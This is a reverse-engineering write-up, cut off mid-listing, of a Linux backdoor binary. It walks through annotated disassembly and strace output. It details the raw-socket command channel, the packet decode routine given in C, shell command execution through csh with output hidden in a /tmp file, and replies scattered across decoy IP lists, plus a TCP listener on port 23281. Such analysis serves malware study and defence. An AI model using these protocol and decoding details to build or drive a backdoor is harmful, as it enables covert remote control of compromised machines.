objdump -x the-binary the-binary: file format elf32-i386 the-binary architecture: i386, flags 0x00000102: EXEC_P, D_PAGED start address 0x08048090 Program Header: LOAD off 0x00000000 vaddr 0x08048000 paddr 0x08048000 align 2**12 filesz 0x00024222 memsz 0x00024222 flags r-x LOAD off 0x00024228 vaddr 0x0806d228 paddr 0x0806d228 align 2**12 filesz 0x0000c094 memsz 0x00011970 flags rw- Sections: Idx Name Size VMA LMA File off Algn 0 .init 00000008 08048080 08048080 00000080 2**4 CONTENTS, ALLOC, LOAD, READONLY, CODE 1 .text 0001f53c 08048090 08048090 00000090 2**4 CONTENTS, ALLOC, LOAD, READONLY, CODE 2 __libc_subinit 00000004 080675cc 080675cc 0001f5cc 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 3 .fini 00000008 080675d0 080675d0 0001f5d0 2**4 CONTENTS, ALLOC, LOAD, READONLY, CODE 4 .rodata 00004c4a 080675d8 080675d8 0001f5d8 2**2 CONTENTS, ALLOC, LOAD, READONLY, DATA 5 .data 0000c084 0806d228 0806d228 00024228 2**2 CONTENTS, ALLOC, LOAD, DATA 6 .ctors 00000008 080792ac 080792ac 000302ac 2**2 CONTENTS, ALLOC, LOAD, DATA 7 .dtors 00000008 080792b4 080792b4 000302b4 2**2 CONTENTS, ALLOC, LOAD, DATA 8 .bss 000058dc 080792bc 080792bc 000302bc 2**2 ALLOC 9 .note 00000d5c 00000000 00000000 000302bc 2**0 CONTENTS, READONLY 10 .comment 00000ea6 00000000 00000000 00031018 2**0 CONTENTS, READONLY objdump: the-binary: no symbols
Extract the strings from the file strings the-binary > strings
Extract the read only section .rodata
objdump -s -j .rodata the-binary > rodata
Disassemble the-binary
objdump -d the-binary > the-binary.dis
1-3,6-8 4,9 12 5
strace -i -f the-binary
upeek: ptrace(PTRACE_PEEKUSER, ... ): No such process [????????] execve("/home/kmaster/src/essai/reverse/the-binary", ["/home/kmaster/src/essai/reverse/the-binary"], [/* 23 vars */]) = 0 [080480b6] personality(0 /* PER_??? */) = 0 [08057216] geteuid() = 0 [080574f9] sigaction(SIGCHLD, {SIG_IGN}, {SIG_DFL}, 0x40063868) = 0 [080571f2] fork() = 1472 [pid 1472] [08057346] setsid() = 1472 [pid 1472] [080574f9] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0 [pid 1472] [080571f2] fork() = 1473 [pid 1473] [08057142] chdir("/") = 0 [pid 1473] [0805716e] close(0) = 0 [pid 1473] [0805716e] close(1) = 0 [pid 1473] [0805716e] close(2) = 0 [pid 1473] [08057452] time(NULL) = 1021011869 [pid 1473] [08056d1e] socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0 [pid 1473] [080574f9] sigaction(SIGHUP, {SIG_IGN}, {SIG_DFL}, 0x40063868) = 0 [pid 1473] [080574f9] sigaction(SIGTERM, {SIG_IGN}, {SIG_DFL}, 0x40063868) = 0 [pid 1473] [080574f9] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0 [pid 1473] [080574f9] sigaction(SIGCHLD, {SIG_IGN}, {SIG_IGN}, 0x80575a8) = 0 [pid 1473] [08056b74] recv(0, <unfinished ...> [pid 1471] [08057562] _exit(0) = ? [pid 1472] [08057562] _exit(0) = ?
Using this output, we know where are some functions. By exemple,
recv
function is at 8056b74
.
man syscalls
8056b63: ba 0a 00 00 00 mov $0xa,%edx 8056b68: 8d 4d f0 lea 0xfffffff0(%ebp),%ecx 8056b6b: b8 66 00 00 00 mov $0x66,%eax 8056b70: 89 d3 mov %edx,%ebx 8056b72: cd 80 int $0x80The function number is eax register. Actually, eax register egals 0x66 or 102 in decimal. If you look in
/usr/include/asm/unistd.h
, you will see it's the
socketcall function.
#define __NR_socketcall 102In register ebx, you have the socketcall subfunction, its value is 0xa or 10. You can find in /usr/include/linux/net.h file, it's the sys_recv function.
#define SYS_RECV 10 /* sys_recv(2) */This function call is a call to recv().
Extract from rodata, the read only part of the-binary.
8068e78 24350000 40282329 20546865 204c696e $5..@(#) The Lin 8068e88 75782043 206c6962 72617279 20352e33 ux C library 5.3 8068e98 2e313200 7c8e0608 474d5400 20202000 .12.|...GMT. .
RedHat 4.1 is shipped with the libc 5.3.12 (it's not the only one). I got libc.a from libc-static-5.3.12-17.i386.rpm and use objdump to get a disassembly.
objdump -d libc.a > libc.dis
Extract of reverse/libc.dis
00000000 <recv>: 0: 55 push %ebp 1: 89 e5 mov %esp,%ebp 3: 83 ec 10 sub $0x10,%esp 6: 56 push %esi 7: 53 push %ebx 8: 8b 55 0c mov 0xc(%ebp),%edx b: 8b 4d 10 mov 0x10(%ebp),%ecx e: 8b 45 14 mov 0x14(%ebp),%eax 11: 89 45 fc mov %eax,0xfffffffc(%ebp) 14: 8b 5d 08 mov 0x8(%ebp),%ebx 17: 89 5d f0 mov %ebx,0xfffffff0(%ebp) 1a: 89 55 f4 mov %edx,0xfffffff4(%ebp) 1d: 89 4d f8 mov %ecx,0xfffffff8(%ebp) 20: ba 0a 00 00 00 mov $0xa,%edx 25: 8d 4d f0 lea 0xfffffff0(%ebp),%ecx 28: b8 66 00 00 00 mov $0x66,%eax 2d: 89 d3 mov %edx,%ebx 2f: cd 80 int $0x80
We can find a similar code in the disassembly of the-binary.
8056b44: 55 push %ebp 8056b45: 89 e5 mov %esp,%ebp 8056b47: 83 ec 10 sub $0x10,%esp 8056b4a: 53 push %ebx 8056b4b: 8b 55 0c mov 0xc(%ebp),%edx 8056b4e: 8b 4d 10 mov 0x10(%ebp),%ecx 8056b51: 8b 45 14 mov 0x14(%ebp),%eax 8056b54: 89 45 fc mov %eax,0xfffffffc(%ebp) 8056b57: 8b 5d 08 mov 0x8(%ebp),%ebx 8056b5a: 89 5d f0 mov %ebx,0xfffffff0(%ebp) 8056b5d: 89 55 f4 mov %edx,0xfffffff4(%ebp) 8056b60: 89 4d f8 mov %ecx,0xfffffff8(%ebp) 8056b63: ba 0a 00 00 00 mov $0xa,%edx 8056b68: 8d 4d f0 lea 0xfffffff0(%ebp),%ecx 8056b6b: b8 66 00 00 00 mov $0x66,%eax 8056b70: 89 d3 mov %edx,%ebx 8056b72: cd 80 int $0x80
8056b44 is the start of the recv() function.
[pid 1473] [08056d1e] socket(PF_INET, SOCK_RAW, 0xb /* IPPROTO_??? */) = 0
As read in the strace output, a raw socket is created. This
socket handles IP packet with 0xB protocol. From
/etc/protocols
, it should be Network Voice Protocol
(nvp).
80482b0: 6a 00 push $0x0 80482b2: 68 00 08 00 00 push $0x800 80482b7: 8d 85 00 f8 ff ff lea 0xfffff800(%ebp),%eax 80482bd: 50 push %eax 80482be: 8b 8d 38 bb ff ff mov 0xffffbb38(%ebp),%ecx 80482c4: 51 push %ecx 80482c5: e8 7a e8 00 00 call 0x8056b44 // recv
The man page (man 2 recv) gives the following prototype:
int recv(int s, void *buf, int len, unsigned int flags);
The socket is stored at 0xffffbb38(%ebp)
(local
variable, stack). The buffer is at 0xfffff800(%ebp)
and is 2048 bytes length.
804814d: 8d 95 00 f8 ff ff lea 0xfffff800(%ebp),%edx 8048153: 89 95 30 bb ff ff mov %edx,0xffffbb30(%ebp)0xffffbb2c(%ebp) is a pointer to the data (0xfffff814=0xfffff800+20,ip header is 20 bytes)
8048159: 8d 8d 14 f8 ff ff lea 0xfffff814(%ebp),%ecx 804815f: 89 8d 2c bb ff ff mov %ecx,0xffffbb2c(%ebp)0xffffbb28(%ebp) is a pointer to &data[2] (0xfffff816=0xfffff814+2)
8048165: 8d 95 16 f8 ff ff lea 0xfffff816(%ebp),%edx 804816b: 89 95 28 bb ff ff mov %edx,0xffffbb28(%ebp)0xffffbb20(%ebp) is a pointer to a buffer for decoded data.
8048297: 8d 8d 00 f0 ff ff lea 0xfffff000(%ebp),%ecx 804829d: 89 8d 20 bb ff ff mov %ecx,0xffffbb20(%ebp)
Using this knowledge, we can understand what is checked after the recv call.
The length of read data is stored in esi register.
80482ca: 89 c6 mov %eax,%esi 80482cc: 83 c4 10 add $0x10,%esp
The IP protocol is checked (See RFC 791 for IP header), it must be nvp (0xB).
80482cf: 8b 95 30 bb ff ff mov 0xffffbb30(%ebp),%edx 80482d5: 80 7a 09 0b cmpb $0xb,0x9(%edx) 80482d9: 0f 85 d9 0b 00 00 jne 0x8048eb8Check if data[0]==0x02
80482df: 8b 8d 2c bb ff ff mov 0xffffbb2c(%ebp),%ecx 80482e5: 80 39 02 cmpb $0x2,(%ecx) 80482e8: 0f 85 ca 0b 00 00 jne 0x8048eb8The packet size must be 201 bytes or more, so the data size must be 181 bytes or more (ip header=20).
80482ee: 81 fe c8 00 00 00 cmp $0xc8,%esi 80482f4: 0f 8e be 0b 00 00 jle 0x8048eb8
80482fa: 8b 95 20 bb ff ff mov 0xffffbb20(%ebp),%edx 8048300: 52 push %edx
0xffffbb20(%ebp)
is a pointer to a buffer for decoded
data.
8048301: 8b 8d 28 bb ff ff mov 0xffffbb28(%ebp),%ecx 8048307: 51 push %ecx
0xffffbb28(%ebp)
is &data[2].
8048308: 8d 46 ea lea 0xffffffea(%esi),%eax 804830b: 50 push %eax 804830c: e8 d7 1e 00 00 call 0x804a1e8
eax is egal to the number of bytes received - 22 (ip header size
+ 2=22, -22=0xffffffea). We have decode(nbr_bytes_received - 22,
&data[2], decoded_data)
The code is obfuscated, unoptimized.
decrypt: 804a1e8: 55 push %ebp 804a1e9: 89 e5 mov %esp,%ebp 804a1eb: 83 ec 04 sub $0x4,%esp 804a1ee: 57 push %edi 804a1ef: 56 push %esi 804a1f0: 53 push %ebx 804a1f1: 8b 7d 08 mov 0x8(%ebp),%edi // edi=size 804a1f4: 8d 5f ff lea 0xffffffff(%edi),%ebx // size - 1 804a1f7: 8d 47 03 lea 0x3(%edi),%eax // eax=size+2 804a1fa: 24 fc and $0xfc,%al 804a1fc: 29 c4 sub %eax,%esp 804a1fe: 89 65 fc mov %esp,0xfffffffc(%ebp) // other dest[0]=0; 804a201: 8a 05 e5 75 06 08 mov octet_0,%al 804a207: 8b 75 10 mov 0x10(%ebp),%esi // dest 804a20a: 88 06 mov %al,(%esi) 804a20c: 85 db test %ebx,%ebx 804a20e: 0f 8c 87 00 00 00 jl decryptf decryptb: if(ebx>0) 804a214: 8d 53 ff lea 0xffffffff(%ebx),%edx 804a217: 85 db test %ebx,%ebx 804a219: 74 11 je 0x804a22c 804a21b: 8b 75 0c mov 0xc(%ebp),%esi // src 804a21e: 0f b6 04 33 movzbl (%ebx,%esi,1),%eax 804a222: 0f b6 14 32 movzbl (%edx,%esi,1),%edx 804a226: 29 d0 sub %edx,%eax eax=source[ebx]-source[ebx-1]; 804a228: eb 08 jmp 0x804a232 804a22a: 8d 36 lea (%esi),%esi else eax=source[0]; 804a22c: 8b 75 0c mov 0xc(%ebp),%esi 804a22f: 0f b6 06 movzbl (%esi),%eax ecx=eax-0x17; 804a232: 8d 48 e9 lea 0xffffffe9(%eax),%ecx 804a235: 85 c9 test %ecx,%ecx 804a237: 7d 0b jge 0x804a244 804a239: 8d 76 00 lea 0x0(%esi),%esi 804a23c: 81 c1 00 01 00 00 add $0x100,%ecx 804a242: 78 f8 js 0x804a23c for(edx=0;edx<size;edx++) 804a244: 31 d2 xor %edx,%edx 804a246: 39 fa cmp %edi,%edx 804a248: 7d 13 jge 0x804a25d 804a24a: 8d 36 lea (%esi),%esi other[edx]=dest[edx] 804a24c: 8b 75 10 mov 0x10(%ebp),%esi // dest 804a24f: 8a 04 32 mov (%edx,%esi,1),%al 804a252: 8b 75 fc mov 0xfffffffc(%ebp),%esi // esp 804a255: 88 04 32 mov %al,(%edx,%esi,1) 804a258: 42 inc %edx 804a259: 39 fa cmp %edi,%edx 804a25b: 7c ef jl 0x804a24c 804a25d: 8b 75 10 mov 0x10(%ebp),%esi // dest 804a260: 88 0e mov %cl,(%esi) dest[0]=cl; 804a262: ba 01 00 00 00 mov $0x1,%edx 804a267: 39 fa cmp %edi,%edx 804a269: 7d 13 jge 0x804a27e 804a26b: 90 nop for(edx=1;edx<edi;edx++) 804a26c: 8b 75 fc mov 0xfffffffc(%ebp),%esi 804a26f: 8a 44 32 ff mov 0xffffffff(%edx,%esi,1),%al dest[edx]=other[edx-1]; 804a273: 8b 75 10 mov 0x10(%ebp),%esi // dest 804a276: 88 04 32 mov %al,(%edx,%esi,1) 804a279: 42 inc %edx 804a27a: 39 fa cmp %edi,%edx 804a27c: 7c ee jl 0x804a26c Use snprintf to get other=ecx,dest 804a27e: 8b 75 fc mov 0xfffffffc(%ebp),%esi 804a281: 56 push %esi 804a282: 51 push %ecx 804a283: 68 bf 78 06 08 push $0x80678bf %c%s 804a288: 8b 75 10 mov 0x10(%ebp),%esi // dest 804a28b: 56 push %esi 804a28c: e8 77 55 00 00 call sprint 804a291: 83 c4 10 add $0x10,%esp 804a294: 4b dec %ebx 804a295: 0f 89 79 ff ff ff jns decryptb decryptf: 804a29b: 8d 65 f0 lea 0xfffffff0(%ebp),%esp 804a29e: 5b pop %ebx 804a29f: 5e pop %esi 804a2a0: 5f pop %edi 804a2a1: 89 ec mov %ebp,%esp 804a2a3: 5d pop %ebp 804a2a4: c3 retIn fact, the algorithm is simple
void decode(const int len, const unsigned char *src, unsigned char *dst) { int i; for(i=len-1;i>0;i--) dst[i]=src[i]-src[i-1]-0x17; dst[0]=src[0]-0x17; }
At 0x804832c, we have a function table. There are 12 functions.
804835c: 8a 05 e5 75 06 08 mov octet_0,%al 8048362: 88 85 00 f8 ff ff mov %al,buffer_sock_raw(%ebp) 8048368: a1 7c e7 07 08 mov 0x807e77c,%eax 804836d: 88 85 00 f8 ff ff mov %al,buffer_sock_raw(%ebp) data[1]=1 8048373: c6 85 01 f8 ff ff 01 movb $0x1,0xfffff801(%ebp) data[2]=7 804837a: c6 85 02 f8 ff ff 07 movb $0x7,0xfffff802(%ebp) is working ? 8048381: 83 3d 74 e7 07 08 00 cmpl $0x0,pid 8048388: 74 16 je 0x80483a0 data[3]=1, working 804838a: c6 85 03 f8 ff ff 01 movb $0x1,0xfffff803(%ebp) data[4]=fonction 8048391: a1 78 e7 07 08 mov function_nbr,%eax 8048396: 88 85 04 f8 ff ff mov %al,0xfffff804(%ebp) 804839c: eb 09 jmp 0x80483a7 804839e: 8d 36 lea (%esi),%esi data[3]=0, non working 80483a0: c6 85 03 f8 ff ff 00 movb $0x0,0xfffff803(%ebp) add random garbage and sent the answer using IP list 80483a7: 8b 95 20 bb ff ff mov decrypted_data_ptr(%ebp),%edx 80483ad: 52 push %edx 80483ae: 8d 85 00 f8 ff ff lea buffer_sock_raw(%ebp),%eax 80483b4: 50 push %eax 80483b5: 68 90 01 00 00 push $0x190 // 400 80483ba: e8 d5 1d 00 00 call encrypt 80483bf: e8 94 dc 00 00 call call_random 80483c4: b9 c9 00 00 00 mov $0xc9,%ecx // 201 80483c9: 99 cltd 80483ca: f7 f9 idiv %ecx,%eax 80483cc: 89 d3 mov %edx,%ebx 80483ce: 8d 83 90 01 00 00 lea 0x190(%ebx),%eax // add 0-200 80483d4: 50 push %eax 80483d5: 8b 95 20 bb ff ff mov decrypted_data_ptr(%ebp),%edx 80483db: 52 push %edx 80483dc: 8b 8d 1c bb ff ff mov 0xffffbb1c(%ebp),%ecx // IP list 80483e2: 51 push %ecx 80483e3: e8 e4 0a 00 00 call go_send_raw
See function 2 for go_send_raw function
function_2: Backup parameters: "stealth" mode and IP 80483f0: 0f b6 95 02 f0 ff ff movzbl 0xfffff002(%ebp),%edx 80483f7: 89 15 84 e7 07 08 mov %edx,0x807e784 80483fd: 8a 85 10 f8 ff ff mov 0xfffff810(%ebp),%al 8048403: 88 05 80 e7 07 08 mov %al,0x807e780 8048409: 8a 85 11 f8 ff ff mov 0xfffff811(%ebp),%al 804840f: 88 05 81 e7 07 08 mov %al,0x807e781 8048415: 8a 85 12 f8 ff ff mov 0xfffff812(%ebp),%al 804841b: 88 05 82 e7 07 08 mov %al,0x807e782 8048421: 8a 85 13 f8 ff ff mov 0xfffff813(%ebp),%al 8048427: 88 05 83 e7 07 08 mov %al,0x807e783 Get random position in edi 804842d: 6a 00 push $0x0 804842f: e8 10 f0 00 00 call time 8048434: 83 c4 04 add $0x4,%esp 8048437: 50 push %eax 8048438: e8 63 d5 00 00 call srandom 804843d: 83 c4 04 add $0x4,%esp 8048440: e8 13 dc 00 00 call call_random 8048445: b9 0a 00 00 00 mov $0xa,%ecx 804844a: 99 cltd 804844b: f7 f9 idiv %ecx,%eax 804844d: 89 d7 mov %edx,%edi for(ebx=0;ebx<10;ebx++) 804844f: 31 db xor %ebx,%ebx 8048451: 31 f6 xor %esi,%esi 8048453: 90 nop function_2_loop: edi position is reserved 8048454: 39 fb cmp %edi,%ebx 8048456: 0f 84 cf 00 00 00 je 0x804852b 804845c: 83 3d 84 e7 07 08 02 cmpl $0x2,0x807e784 8048463: 75 33 jne 0x8048498 data[2]==2, insert IP in IP list 8048465: 8a 84 9d 03 f0 ff ff mov 0xfffff003(%ebp,%ebx,4),%al 804846c: 8b 95 1c bb ff ff mov 0xffffbb1c(%ebp),%edx 8048472: 88 04 32 mov %al,(%edx,%esi,1) 8048475: 8a 84 9d 04 f0 ff ff mov 0xfffff004(%ebp,%ebx,4),%al 804847c: 88 44 16 01 mov %al,0x1(%esi,%edx,1) 8048480: 8a 84 9d 05 f0 ff ff mov 0xfffff005(%ebp,%ebx,4),%al 8048487: 88 44 16 02 mov %al,0x2(%esi,%edx,1) 804848b: 8a 84 9d 06 f0 ff ff mov 0xfffff006(%ebp,%ebx,4),%al 8048492: e9 90 00 00 00 jmp 0x8048527 8048497: 90 nop Get a random IP 8048498: e8 bb db 00 00 call call_random 804849d: 89 85 10 bb ff ff mov %eax,0xffffbb10(%ebp) 80484a3: 85 c0 test %eax,%eax 80484a5: 7d 0c jge 0x80484b3 80484a7: 8d 88 ff 00 00 00 lea 0xff(%eax),%ecx 80484ad: 89 8d 10 bb ff ff mov %ecx,0xffffbb10(%ebp) 80484b3: 8b 95 1c bb ff ff mov 0xffffbb1c(%ebp),%edx 80484b9: 88 04 16 mov %al,(%esi,%edx,1) 80484bc: e8 97 db 00 00 call call_random 80484c1: 89 85 10 bb ff ff mov %eax,0xffffbb10(%ebp) 80484c7: 85 c0 test %eax,%eax 80484c9: 7d 0c jge 0x80484d7 80484cb: 8d 88 ff 00 00 00 lea 0xff(%eax),%ecx 80484d1: 89 8d 10 bb ff ff mov %ecx,0xffffbb10(%ebp) 80484d7: 8b 95 1c bb ff ff mov 0xffffbb1c(%ebp),%edx 80484dd: 88 44 16 01 mov %al,0x1(%esi,%edx,1) 80484e1: e8 72 db 00 00 call call_random 80484e6: 89 85 10 bb ff ff mov %eax,0xffffbb10(%ebp) 80484ec: 85 c0 test %eax,%eax 80484ee: 7d 0c jge 0x80484fc 80484f0: 8d 88 ff 00 00 00 lea 0xff(%eax),%ecx 80484f6: 89 8d 10 bb ff ff mov %ecx,0xffffbb10(%ebp) 80484fc: 8b 95 1c bb ff ff mov 0xffffbb1c(%ebp),%edx 8048502: 88 44 16 02 mov %al,0x2(%esi,%edx,1) 8048506: e8 4d db 00 00 call call_random 804850b: 89 85 10 bb ff ff mov %eax,0xffffbb10(%ebp) 8048511: 85 c0 test %eax,%eax 8048513: 7d 0c jge 0x8048521 8048515: 8d 88 ff 00 00 00 lea 0xff(%eax),%ecx 804851b: 89 8d 10 bb ff ff mov %ecx,0xffffbb10(%ebp) 8048521: 8b 95 1c bb ff ff mov 0xffffbb1c(%ebp),%edx end of for 8048527: 88 44 16 03 mov %al,0x3(%esi,%edx,1) 804852b: 83 c6 04 add $0x4,%esi 804852e: 43 inc %ebx 804852f: 83 fb 09 cmp $0x9,%ebx 8048532: 0f 8e 1c ff ff ff jle 0x8048454 if data[2]==0, the IP will be at the begining of the list and will be the only one. 8048538: a1 84 e7 07 08 mov 0x807e784,%eax 804853d: 85 c0 test %eax,%eax 804853f: 75 02 jne 0x8048543 8048541: 31 ff xor %edi,%edi if data[2]!=2, the IP will be at the the random edi position. 8048543: 83 f8 02 cmp $0x2,%eax 8048546: 0f 84 6c 09 00 00 je go_boucle 804854c: c1 e7 02 shl $0x2,%edi 804854f: 89 bd 14 bb ff ff mov %edi,0xffffbb14(%ebp) 8048555: 8a 85 03 f0 ff ff mov 0xfffff003(%ebp),%al 804855b: 8b 8d 1c bb ff ff mov 0xffffbb1c(%ebp),%ecx 8048561: 88 04 0f mov %al,(%edi,%ecx,1) 8048564: 8a 85 04 f0 ff ff mov 0xfffff004(%ebp),%al 804856a: 8b 95 14 bb ff ff mov 0xffffbb14(%ebp),%edx 8048570: 88 44 0a 01 mov %al,0x1(%edx,%ecx,1) 8048574: 8a 85 05 f0 ff ff mov 0xfffff005(%ebp),%al 804857a: 88 44 0a 02 mov %al,0x2(%edx,%ecx,1) 804857e: 8a 85 06 f0 ff ff mov 0xfffff006(%ebp),%al 8048584: 88 44 0a 03 mov %al,0x3(%edx,%ecx,1) 8048588: e9 2b 09 00 00 jmp go_boucle
The function go_send_raw is used to send answer
go_send_raw: 8048ecc: 55 push %ebp 8048ecd: 89 e5 mov %esp,%ebp 8048ecf: 57 push %edi 8048ed0: 56 push %esi 8048ed1: 53 push %ebx 8048ed2: 8b 45 08 mov 0x8(%ebp),%eax 8048ed5: 8b 7d 10 mov 0x10(%ebp),%edi Check if "stealth" mode is present 8048ed8: 83 3d 84 e7 07 08 00 cmpl $0x0,0x807e784 8048edf: 74 2f je 0x8048f10 Sent packet to the IP list 8048ee1: 89 c3 mov %eax,%ebx 8048ee3: 8d 73 24 lea 0x24(%ebx),%esi 8048ee6: 8d 36 lea (%esi),%esi 8048ee8: 68 a0 0f 00 00 push $0xfa0 8048eed: e8 be c6 00 00 call feof 8048ef2: 57 push %edi 8048ef3: 8b 55 0c mov 0xc(%ebp),%edx 8048ef6: 52 push %edx 8048ef7: 53 push %ebx 8048ef8: 68 80 e7 07 08 push $0x807e780 8048efd: e8 92 00 00 00 call send_raw 8048f02: 83 c4 14 add $0x14,%esp 8048f05: 83 c3 04 add $0x4,%ebx 8048f08: 39 f3 cmp %esi,%ebx 8048f0a: 7e dc jle 0x8048ee8 8048f0c: eb 12 jmp 0x8048f20 8048f0e: 8d 36 lea (%esi),%esi Send packet to one IP only 8048f10: 57 push %edi 8048f11: 8b 55 0c mov 0xc(%ebp),%edx 8048f14: 52 push %edx 8048f15: 50 push %eax 8048f16: 68 80 e7 07 08 push $0x807e780 8048f1b: e8 74 00 00 00 call send_raw return 1 8048f20: b8 01 00 00 00 mov $0x1,%eax 8048f25: 8d 65 f4 lea 0xfffffff4(%ebp),%esp 8048f28: 5b pop %ebx 8048f29: 5e pop %esi 8048f2a: 5f pop %edi 8048f2b: 89 ec mov %ebp,%esp 8048f2d: 5d pop %ebp 8048f2e: c3 ret
80485f3: 68 e6 75 06 08 push $file_tmp 80485f8: 8b 8d 20 bb ff ff mov decrypted_data_ptr(%ebp),%ecx 80485fe: 51 push %ecx 80485ff: 68 f5 75 06 08 push m_csh 8048604: 8d 9d 00 f8 ff ff lea buffer_sock_raw(%ebp),%ebx 804860a: 53 push %ebx 804860b: e8 f8 71 00 00 call sprintf
The program manipulates the user command to redirect the command
output to the file /tmp/.hj237349
. It's equivalent
to
sprintf("/bin/csh -f -c "%s" 1gt; %s 2>&1",decrypted_data, "/tmp/.hj237349")
8048610: 53 push %ebx
8048611: e8 d2 d1 00 00 call system
file /tmp/.hj237349
is opened in read only
8048616: 68 14 76 06 08 push $0x8067614 // "rb"
804861b: 68 e6 75 06 08 push $file_tmp
8048620: e8 fb 6f 00 00 call fopen
8048625: 89 85 24 bb ff ff mov %eax,0xffffbb24(%ebp) // handle
804862b: 83 c4 1c add $0x1c,%esp
804862e: 85 c0 test %eax,%eax
8048630: 0f 84 dc 00 00 00 je 0x8048712
8048636: 31 ff xor %edi,%edi // edi=0, first packet
8048638: 8d 95 70 ee ff ff lea 0xffffee70(%ebp),%edx
804863e: 89 95 18 bb ff ff mov %edx,0xffffbb18(%ebp)
398 bytes are read
8048644: 8b 8d 24 bb ff ff mov 0xffffbb24(%ebp),%ecx // handle
804864a: 51 push %ecx
804864b: 68 8e 01 00 00 push $0x18e // 398
8048650: 6a 01 push $0x1
8048652: 8d 85 00 f8 ff ff lea buffer_sock_raw(%ebp),%eax
8048658: 50 push %eax
8048659: e8 76 70 00 00 call _IO_fread
804865e: 89 c6 mov %eax,%esi
8048660: c6 84 2e 00 f8 ff ff movb $0x0,buffer_sock_raw(%esi,%ebp,1)
8048667: 00
copy data
8048668: 31 db xor %ebx,%ebx
804866a: 83 c4 10 add $0x10,%esp
804866d: 8d 76 00 lea 0x0(%esi),%esi
8048670: 8a 84 2b 00 f8 ff ff mov buffer_sock_raw(%ebx,%ebp,1),%al
8048677: 88 84 2b 02 f0 ff ff mov %al,0xfffff002(%ebx,%ebp,1)
804867e: 43 inc %ebx
804867f: 81 fb 8d 01 00 00 cmp $0x18d,%ebx
8048685: 7e e9 jle 0x8048670
First packet will have data[1]=3, others 4.
8048687: 85 ff test %edi,%edi
8048689: 75 11 jne 0x804869c
804868b: c6 85 01 f0 ff ff 03 movb $0x3,0xfffff001(%ebp) // first packet, type=3
8048692: bf 01 00 00 00 mov $0x1,%edi
8048697: eb 0a jmp 0x80486a3
8048699: 8d 76 00 lea 0x0(%esi),%esi
804869c: c6 85 01 f0 ff ff 04 movb $0x4,0xfffff001(%ebp) // next packet, type=4
Encrypt data
80486a3: 8b 95 18 bb ff ff mov 0xffffbb18(%ebp),%edx // buffer data
80486a9: 52 push %edx
80486aa: 8b 8d 20 bb ff ff mov decrypted_data_ptr(%ebp),%ecx
80486b0: 51 push %ecx
80486b1: 68 90 01 00 00 push $0x190
80486b6: e8 d9 1a 00 00 call encrypt
Between 0 and 200 bytes of random data are added
80486bb: e8 98 d9 00 00 call call_random
80486c0: b9 c9 00 00 00 mov $0xc9,%ecx
80486c5: 99 cltd
80486c6: f7 f9 idiv %ecx,%eax
80486c8: 89 d3 mov %edx,%ebx
80486ca: 8d 83 90 01 00 00 lea 0x190(%ebx),%eax // add random data, 0-200
and send. See function 2 for go_send_raw function
80486d0: 50 push %eax
80486d1: 8b 95 18 bb ff ff mov 0xffffbb18(%ebp),%edx // buffer data
80486d7: 52 push %edx
80486d8: 8b 8d 1c bb ff ff mov 0xffffbb1c(%ebp),%ecx
80486de: 51 push %ecx
80486df: e8 e8 07 00 00 call go_send_raw
if it's not the end of the file, it loops
80486e4: 68 80 1a 06 00 push $0x61a80
80486e9: e8 c2 ce 00 00 call feof
80486ee: 83 c4 1c add $0x1c,%esp
80486f1: 85 f6 test %esi,%esi
80486f3: 0f 85 4b ff ff ff jne 0x8048644
close the handle, delete the file and the childs exit
80486f9: 8b 95 24 bb ff ff mov 0xffffbb24(%ebp),%edx // handle
80486ff: 52 push %edx
8048700: e8 3b 6e 00 00 call fclose
8048705: 68 e6 75 06 08 push $file_tmp
804870a: e8 ad ec 00 00 call unlink
804870f: 83 c4 08 add $0x8,%esp
8048712: 6a 00 push $0x0
8048714: e8 3b ee 00 00 call exit
port 0x5AF1=23281 80488e3: 66 c7 85 3a ee ff ff movw $0xf15a,0xffffee3a(%ebp) 80488ea: 5a f1 80488ec: c7 85 3c ee ff ff 00 movl $0x0,0xffffee3c(%ebp) 80488f3: 00 00 00 80488f6: c7 85 40 bb ff ff 01 movl $0x1,0xffffbb40(%ebp) 80488fd: 00 00 00 create a TCP socket, socket(PF_INET, SOCK_STREAM, IPPROTO_IP) 8048900: 6a 00 push $0x0 8048902: 6a 01 push $0x1 8048904: 6a 02 push $0x2 // PF_INET 8048906: e8 e9 e3 00 00 call socket 804890b: 89 85 38 bb ff ff mov %eax,socket_proto_b(%ebp) ignore some signals, see "kill -l" 8048911: 6a 01 push $0x1 8048913: 6a 11 push $0x11 // SIGCHLD 8048915: e8 a2 e0 00 00 call bsd_signal 804891a: 6a 01 push $0x1 804891c: 6a 11 push $0x11 // SIGCHLD, again ? 804891e: e8 99 e0 00 00 call bsd_signal 8048923: 6a 01 push $0x1 8048925: 6a 01 push $0x1 // SIGHUP 8048927: e8 90 e0 00 00 call bsd_signal 804892c: 83 c4 24 add $0x24,%esp 804892f: 6a 01 push $0x1 8048931: 6a 0f push $0xf // SIGTERM 8048933: e8 84 e0 00 00 call bsd_signal 8048938: 6a 01 push $0x1 804893a: 6a 02 push $0x2 // SIGINT 804893c: e8 7b e0 00 00 call bsd_signal setsockopt(sock_tcp, SOL_SOCKET, SO_REUSEADDR, [1], 4) 8048941: 6a 04 push $0x4 8048943: 8d 85 40 bb ff ff lea 0xffffbb40(%ebp),%eax 8048949: 50 push %eax 804894a: 6a 02 push $0x2 804894c: 6a 01 push $0x1 804894e: 8b 8d 38 bb ff ff mov socket_proto_b(%ebp),%ecx 8048954: 51 push %ecx 8048955: e8 42 e3 00 00 call setsockopt 804895a: 83 c4 24 add $0x24,%esp bind(sock_tcp, {sin_family=AF_INET, sin_port=htons(23281), sin_addr=inet_addr("0.0.0.0")}}, 16) 804895d: 6a 10 push $0x10 // sizeof(addr) 804895f: 8d 85 38 ee ff ff lea 0xffffee38(%ebp),%eax 8048965: 50 push %eax // addr 8048966: 8b 95 38 bb ff ff mov socket_proto_b(%ebp),%edx 804896c: 52 push %edx 804896d: e8 02 e1 00 00 call bind listen(sock_tcp,3) 8048972: 6a 03 push $0x3 8048974: 8b 8d 38 bb ff ff mov socket_proto_b(%ebp),%ecx 804897a: 51 push %ecx 804897b: e8 84 e1 00 00 call listen 8048980: 83 c4 14 add $0x14,%esp 8048983: 90 nop accept(sock_tcp,addr,sizeof(addr)) 8048984: 8d 85 3c bb ff ff lea 0xffffbb3c(%ebp),%eax // length 